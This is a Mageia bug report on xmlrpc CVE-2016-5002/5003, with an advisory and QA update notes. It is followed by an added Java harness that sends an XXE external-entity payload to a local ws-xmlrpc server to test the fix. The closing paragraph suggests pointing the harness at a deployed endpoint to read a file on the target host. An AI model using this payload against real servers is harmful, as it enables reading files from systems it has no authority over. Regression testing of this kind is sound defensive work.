| Summary: | xmlrpc new security issues CVE-2016-500[23] | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | critical | ||
| Priority: | Normal | CC: | herman.viaene, lewyssmith, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-32-OK MGA6-64-OK | ||
| Source RPM: | xmlrpc-3.1.3-70.mga6.src.rpm | CVE: | |
| Status comment: | Patches available from Fedora | ||
Description
David Walser
2018-06-01 14:35:03 CEST

David Walser
2018-06-01 14:35:10 CEST
Whiteboard: (none) => MGA6TOO

Comment 1
Fedora has issued an advisory for this on June 2:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5AEMJ2ZNFZVGVMACAZMQQCBOFBVUTNZA/

There was also another CVE.

Summary: xmlrpc new security issue CVE-2016-5003 => xmlrpc new security issues CVE-2016-500[23]

Comment 2
Fixed in xmlrpc-3.1.3-73.mga7 in Cauldron.

Whiteboard: MGA6TOO => (none)

Comment 3
Advisory:
========================

Updated xmlrpc packages fix security vulnerabilities:

XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD (CVE-2016-5002).

A flaw was discovered in the Apache XML-RPC (ws-xmlrpc) library that deserializes untrusted data when the enabledForExtensions setting is enabled. A remote attacker could use this vulnerability to execute arbitrary code via a crafted serialized Java object in an <ex:serializable> element (CVE-2016-5003).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5003
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5AEMJ2ZNFZVGVMACAZMQQCBOFBVUTNZA/
========================

Updated packages in core/updates_testing:
========================
xmlrpc-javadoc-3.1.3-70.1.mga6
xmlrpc-common-3.1.3-70.1.mga6
xmlrpc-client-3.1.3-70.1.mga6
xmlrpc-server-3.1.3-70.1.mga6

from xmlrpc-3.1.3-70.1.mga6.src.rpm

Assignee: java => qa-bugs

Comment 4
Could not find anything useful for QA testing in the CVE links. Have no idea how to start the|a client or server or what ws-xmlrpc means. Handing this one over to whomsoever.

$ locate xmlrpc-client
/usr/share/java/xmlrpc-client.jar
/usr/share/maven-metadata/xmlrpc-xmlrpc-client.xml
/usr/share/maven-poms/xmlrpc-client.pom

$ locate xmlrpc | grep jar
/usr/share/java/xmlrpc-client.jar
/usr/share/java/xmlrpc-common.jar
/usr/share/java/xmlrpc-server.jar
/usr/share/java/pycharm-community/lib/xmlrpc-2.0.1.jar

# java -jar /usr/share/java/xmlrpc-client.jar
no main manifest attribute, in /usr/share/java/xmlrpc-client.jar

CC: (none) => tarazed25

Comment 5
David Walser
Just a clean update will do.

Comment 6
MGA6-32 MATE on IBM Thinkpad R50e

No installation issues, so according to Comment 5, it's OK.

Just for the curious, I found a "simple" example at https://www.tutorialspoint.com/xml-rpc/xml_rpc_examples.htm but that is over my head; someone else more educated in Java might find it interesting enough.

Whiteboard: (none) => MGA6-32-OK

Comment 7
(In reply to David Walser from comment #5)
> Just a clean update will do.

On M6/6 did just that; unsure exactly what Len & Herman had done.

BEFORE update, installed:
xmlrpc-server-3.1.3-70.mga6
xmlrpc-client-3.1.3-70.mga6
xmlrpc-javadoc-3.1.3-70.mga6
xmlrpc-common-3.1.3-70.mga6

The UPDATE was seamless:
xmlrpc-server-3.1.3-70.1.mga6
xmlrpc-client-3.1.3-70.1.mga6
xmlrpc-javadoc-3.1.3-70.1.mga6
xmlrpc-common-3.1.3-70.1.mga6

Validating; advisory from comment 3.

Whiteboard: MGA6-32-OK => MGA6-32-OK MGA6-64-OK

Comment 8
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2019-0002.html

Status: NEW => RESOLVED
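Comment 4 asks how to start a ws-xmlrpc client or server at all, and the advisory in comment 3 describes the two flaws without giving a way to exercise them. The following is an added example written for this page; it is not code from the bug report, from Mageia, or from the ws-xmlrpc project. It starts a throwaway Apache XML-RPC 3.1.3 server on localhost with one handler, checks it with the library's own client (the baseline), then posts a hand-built methodCall whose DTD declares an external entity pointing at a temp file containing a random marker (the CVE-2016-5002 pattern) and reports whether the marker came back. The server is configured with enabledForExtensions left false, which is the setting CVE-2016-5003 depends on. Assumptions: the jar paths in the build comment, ws-commons-util.jar as the runtime dependency of xmlrpc-common, port 18080 being free, and the handler name "Echo". Whether a fixed server answers the probe with a fault or merely leaves the entity unexpanded depends on how the fix was applied; the check that matters is that the marker never appears in the response.

```java
// XmlRpcXxeProbe.java -- added example for QA, not part of the bug report or of ws-xmlrpc.
// Assumed build/run on Mageia 6 with the updated packages (jar paths are an assumption):
//   CP=/usr/share/java/xmlrpc-common.jar:/usr/share/java/xmlrpc-server.jar:\
//      /usr/share/java/xmlrpc-client.jar:/usr/share/java/ws-commons-util.jar
//   javac -cp "$CP" XmlRpcXxeProbe.java && java -cp "$CP:." XmlRpcXxeProbe
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.UUID;

import org.apache.xmlrpc.client.XmlRpcClient;
import org.apache.xmlrpc.client.XmlRpcClientConfigImpl;
import org.apache.xmlrpc.server.PropertyHandlerMapping;
import org.apache.xmlrpc.server.XmlRpcServer;
import org.apache.xmlrpc.server.XmlRpcServerConfigImpl;
import org.apache.xmlrpc.webserver.WebServer;

public class XmlRpcXxeProbe {

    /** Exposed as "Echo.echo" (assumed name); handlers need a public no-arg constructor. */
    public static class Echo {
        public String echo(String s) { return s; }
    }

    private static final int PORT = 18080; // assumption: a free local port
    private static final String ENDPOINT = "http://127.0.0.1:" + PORT + "/xmlrpc";

    public static void main(String[] args) throws Exception {
        // --- server side: the minimal ws-xmlrpc WebServer setup ---
        WebServer webServer = new WebServer(PORT);
        XmlRpcServer xmlRpcServer = webServer.getXmlRpcServer();
        PropertyHandlerMapping phm = new PropertyHandlerMapping();
        phm.addHandler("Echo", Echo.class);
        xmlRpcServer.setHandlerMapping(phm);
        XmlRpcServerConfigImpl serverConfig = (XmlRpcServerConfigImpl) xmlRpcServer.getConfig();
        // CVE-2016-5003 (<ex:serializable> deserialisation) only reaches code when this is true.
        serverConfig.setEnabledForExtensions(false);
        serverConfig.setContentLengthOptional(false);
        webServer.start();

        // Constructed secret: a temp file whose content must never show up in a response.
        String marker = "XXE-MARKER-" + UUID.randomUUID();
        Path secret = Files.createTempFile("xxe-probe", ".txt");
        Files.write(secret, marker.getBytes(StandardCharsets.UTF_8));
        try {
            // --- 1. baseline through the library's own client ---
            XmlRpcClientConfigImpl config = new XmlRpcClientConfigImpl();
            config.setServerURL(new URL(ENDPOINT));
            XmlRpcClient client = new XmlRpcClient();
            client.setConfig(config);
            Object result = client.execute("Echo.echo", new Object[] { "hello" });
            System.out.println("baseline Echo.echo(\"hello\") -> " + result);

            // --- 2. probe: DTD with an external entity, the CVE-2016-5002 pattern ---
            String probe = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE methodCall [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
                + "<methodCall><methodName>Echo.echo</methodName>"
                + "<params><param><value><string>&xxe;</string></value></param></params>"
                + "</methodCall>";
            String response = post(ENDPOINT, probe);
            System.out.println("probe response:\n" + response);
            System.out.println(classify(response, marker));
        } finally {
            Files.deleteIfExists(secret);
            webServer.shutdown();
        }
    }

    /** VULNERABLE if the secret marker was expanded into the reply; anything else is acceptable. */
    static String classify(String response, String marker) {
        if (response.contains(marker)) {
            return "VULNERABLE: external entity was expanded and echoed back";
        }
        if (response.contains("<fault>")) {
            return "OK: server rejected the request with a fault";
        }
        return "OK: entity was not expanded";
    }

    /** Raw HTTP POST of an XML-RPC body; reads the error stream too, since faults may use 4xx/5xx. */
    static String post(String url, String body) throws Exception {
        HttpURLConnection c = (HttpURLConnection) new URL(url).openConnection();
        c.setRequestMethod("POST");
        c.setDoOutput(true);
        c.setRequestProperty("Content-Type", "text/xml");
        byte[] bytes = body.getBytes(StandardCharsets.UTF_8);
        c.setFixedLengthStreamingMode(bytes.length);
        try (OutputStream out = c.getOutputStream()) { out.write(bytes); }
        int status = c.getResponseCode();
        InputStream in = status < 400 ? c.getInputStream() : c.getErrorStream();
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        byte[] chunk = new byte[4096];
        for (int n; (n = in.read(chunk)) > 0; ) buf.write(chunk, 0, n);
        return buf.toString("UTF-8");
    }
}
```

Run it once against the -70.mga6 jars and once against -70.1.mga6: the baseline line should print "hello" both times, and the classification should change from VULNERABLE to OK after the update. The same harness can be pointed at a deployed endpoint by changing ENDPOINT, in which case the file: URI should name a file on the target host rather than the probe's temp file.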